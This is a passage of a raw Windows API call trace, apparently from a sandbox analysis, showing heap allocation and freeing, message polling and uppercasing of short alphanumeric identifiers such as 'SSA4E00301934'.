[0262.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.700] PeekMessageW (in: lpMsg=0x8bf250, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf250) returned 0 [0262.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0262.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.700] PeekMessageW (in: lpMsg=0x8bf4b0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf4b0) returned 0 [0262.700] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0262.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0262.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8a0 | out: hHeap=0x25c0000) returned 1 [0262.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6508 | out: hHeap=0x25c0000) returned 1 [0262.700] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa080 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0c8 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b64e0 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b48 | out: hHeap=0x25c0000) returned 1 [0262.701] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9dc8 | out: hHeap=0x25c0000) returned 1 [0262.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a80 | out: hHeap=0x25c0000) returned 1 [0262.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0262.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa248 | out: hHeap=0x25c0000) returned 1 [0262.702] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0262.702] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1868 [0262.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466dd0 [0262.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.702] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0262.702] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d860 [0262.703] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0262.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0262.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0262.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0262.703] CharUpperBuffW (in: lpsz="A4E00301934", cchLength=0xb | out: lpsz="A4E00301934") returned 0xb [0262.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0262.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1868 | out: hHeap=0x25c0000) returned 1 [0262.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0262.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1868 [0262.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9dc8 [0262.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0262.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0262.703] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0262.703] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0262.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2bb8 [0262.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0262.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0262.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0262.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa0c8 [0262.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0262.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1778 [0262.704] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0262.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a80 [0262.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1e8 [0262.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa080 [0262.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0262.704] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c28 [0262.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0262.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0262.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0262.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9420 [0262.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a8dc0 [0262.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2088 [0262.705] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0262.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0262.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.705] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0262.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0262.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0262.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ca8 [0262.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0262.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.706] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0262.706] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0262.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0262.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0262.706] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.707] CharUpperBuffW (in: lpsz="SSA4E00301934", cchLength=0xd | out: lpsz="SSA4E00301934") returned 0xd [0262.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0262.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a8dc0 | out: hHeap=0x25c0000) returned 1 [0262.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0262.707] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.707] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7e0 [0262.707] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.708] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a8dc0 [0262.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0262.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0262.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0262.708] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0262.708] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0262.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0262.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0262.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.709] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0262.709] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0262.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0262.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0262.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0262.709] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0262.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9af8 | out: hHeap=0x25c0000) returned 1 [0262.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0262.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9af8 [0262.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9288 [0262.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.710] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.710] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa050 [0262.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.710] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0262.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.711] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0262.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.711] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.711] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0262.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0262.712] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0262.712] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0262.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.712] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.712] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0262.713] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0262.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0262.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0262.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.713] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.713] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.713] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0262.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.713] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0262.714] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0262.714] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0262.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0262.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0262.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0262.714] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.714] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.714] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0262.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0262.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e40 | out: hHeap=0x25c0000) returned 1 [0262.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 [0262.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0262.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0262.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2415a18 | out: hHeap=0x25c0000) returned 1 [0262.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0262.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab328 | out: hHeap=0x25c0000) returned 1 [0262.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0262.715] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0262.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249bb10 | out: hHeap=0x25c0000) returned 1 [0262.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.716] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0262.716] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0262.716] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0262.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0262.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0262.716] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0262.716] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2412248 | out: hHeap=0x25c0000) returned 1 